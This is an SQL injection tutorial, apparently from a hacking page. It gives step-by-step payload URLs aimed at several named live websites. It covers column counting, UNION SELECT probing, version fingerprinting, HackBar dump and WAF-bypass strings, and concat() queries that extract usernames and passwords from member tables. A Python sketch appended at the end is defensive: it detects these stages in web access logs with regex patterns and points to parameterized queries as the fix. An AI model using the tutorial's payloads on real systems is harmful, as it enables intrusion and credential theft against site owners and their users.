
example:

http://math4all.in/news.php?id=6

1. Add
order by 1000
and see if the server responds to it.
http://math4all.in/news.php?id=6 order by 1000

2. If not, add
--+ or -- -
after 1000
http://math4all.in/news.php?id=6 order by 1000--+

3. If there is still no error, add a quotation mark after the value 6,
like
http://math4all.in/news.php?id=6' order by 1000--+

4. If an error is found, change 1000 to 1 and see if the site is OK,
then increase the number from 1.
It's like asking the server: do you have this number of columns?
http://math4all.in/news.php?id=6' order by 1--+
http://math4all.in/news.php?id=6' order by 2--+
http://math4all.in/news.php?id=6' order by 3--+
http://math4all.in/news.php?id=6' order by 4--+
http://math4all.in/news.php?id=6' order by 5--+
http://math4all.in/news.php?id=6' order by 6--+
http://math4all.in/news.php?id=6' order by 7--+

5. When asking whether it has a 7th column returns an SQL error,
that means it has only 6 columns.

6. Now you need to find which column is vulnerable,
so add
-
before the value 6,
like this
http://math4all.in/news.php?id=-6' order by 7--+
Also select everything after the value and go to HackBar:
select Union Based,
then select Union Statement,
then select int,int
and give the total number of available columns.
It will now load Union Select with the column numbers.
http://math4all.in/news.php?id=-6' Union Select 1,2,3,4,5,6
http://www.igoergo.com/_site/about.php?id=-4 Union Select 1,2,3,4,5,6
Now search;
columns 3 and 4 are found to be vulnerable.

If a box disturbs the screen, that is called a JavaScript problem,
so disable JavaScript from Tools if needed.

7. Now check or find the version info:
select the vulnerable column and replace it with
version()
or
@@version
like
http://www.igoergo.com/_site/about.php?id=-4 Union Select 1,2,version(),4,5,6
or
http://math4all.in/news.php?id=.6' Union Select 1,@@version,3,4,5,6-- +

The result is 10.1.41-MariaDB-0+deb10u2
If the version is less than 4, then it's not downloadable.

7. Now dump all data:
select a vulnerable column,
like
3 or 4, and
go to HackBar,
select Union Based,
then DIOS MYSQL,
then DIOS BY ZEN,
then DIOS BY ZEN again.
Now execute.
#Why Zen? Zen is lightweight; it works on most websites.

If data is found, then it works.

If not, then
go to HackBar,
select Union Based,
then DIOS MYSQL,
then DIOS BY TRO@JAN WAF,
then select Trojan WAF again;
when the link loads, execute it.

8. When Zen is used, find the InnoDB data.
After InnoDB, check whether there is any data named like pass or user.
If it is not found and "illegal" comes up, then use Trojan WAF:

go to HackBar,
select Union Based,
then DIOS MYSQL,
then DIOS BY TRO@JAN WAF,
then select Trojan WAF again;
when the link loads, execute it.

9. When Zen is used and InnoDB is found,
now find the pass and user data from the database;
use Control + F.

If Trojan is used,
now find the pass and user data from the database;
use Control + F.

When found, note down the name of the database table where it is
and the full names of pass and user.

10. Now dump (download) the pass or user by using
concat(username,password)
and add, at the end of the column numbers, before the --+ sign (if used),
from tablename
Example for
http://www.igoergo.com/_site/about.php?id=-4 Union Select 1,2,3,4,5,6
where columns 3 and 4 are vulnerable:
type there
http://www.igoergo.com/_site/about.php?id=-4 Union Select
1,2,3,concat(username,password),5,6 from member

11. If the username and password are mixed up,
we need to divide them with some text or symbol,
so type, between username and password,
== or anything,
like
http://www.igoergo.com/_site/about.php?id=-4 Union Select
1,2,3,concat(username,==,password),5,6 from member

and select Convert String to Hex
from HackBar,
so the link is
http://www.igoergo.com/_site/about.php?id=-4 Union Select
1,2,3,concat(username,0x3d3d3d,password),5,6 from member

Now we have found the username and password.

12. If the database still returns an error, remove the quotation mark from the link:
remove
'
like
http://aminter.co.th/product2.php?id=-1' Union Select
1,concat(mem_user,0x3d3d,mem_pass),3,4,5 from ck_member --+
to
http://aminter.co.th/product2.php?id=-1 Union Select
1,concat(mem_user,0x3d3d,mem_pass),3,4,5 from ck_member --+
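
Seen from the server side, each step above leaves a recognizable trace in the web access log. The following is an added example, not part of the original page: a Python sketch that URL-decodes request lines and labels the stages described above (ORDER BY column counting, UNION SELECT, version lookup, concat-based dumping). The stage names, function names, IP addresses and log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Stage signatures (assumed names), matched against the URL-decoded query string.
STAGES = [
    ("column_count_probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union_select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("version_fingerprint", re.compile(r"\bversion\s*\(\s*\)|@@version", re.I)),
    ("concat_extraction", re.compile(r"\bconcat\s*\(.*\bfrom\s+\w+", re.I)),
]
# Client IP and request target from a combined-format access log line.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')


def classify(log_line):
    """Return (client_ip, path, [stage labels]), or None if the line does not parse."""
    m = REQUEST.match(log_line)
    if not m:
        return None
    ip, target = m.groups()
    path, _, query = target.partition("?")
    decoded = unquote_plus(query)  # %27 -> ', %20 and + -> space
    return ip, path, [name for name, rx in STAGES if rx.search(decoded)]


def summarize(lines):
    """Collect stages seen per (client, path); several stages from one client is the signal."""
    seen = {}
    for line in lines:
        parsed = classify(line)
        if parsed and parsed[2]:
            seen.setdefault(parsed[:2], set()).update(parsed[2])
    return seen


# Constructed sample lines: documentation IPs, payload shapes taken from the steps above.
TS = '- - [01/Jan/2024:10:00:00 +0000]'
SAMPLE = [
    f'203.0.113.7 {TS} "GET /news.php?id=6 HTTP/1.1" 200 512',
    f'203.0.113.7 {TS} "GET /news.php?id=6%27%20order%20by%207--+ HTTP/1.1" 500 87',
    f'203.0.113.7 {TS} "GET /news.php?id=-6%27%20Union%20Select%201,@@version,3,4,5,6--+ HTTP/1.1" 200 530',
    f'203.0.113.7 {TS} "GET /about.php?id=-4+Union+Select+1,2,3,concat(username,0x3d3d,password),5,6+from+member HTTP/1.1" 200 611',
    f'198.51.100.9 {TS} "GET /news.php?id=12 HTTP/1.1" 200 498',
]

if __name__ == "__main__":
    for (ip, path), stages in summarize(SAMPLE).items():
        print(ip, path, sorted(stages))
```

These signatures are a heuristic for triage and can be evaded or produce false positives; the fix for the underlying flaw is to bind the id value as a query parameter instead of concatenating it into the SQL string.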
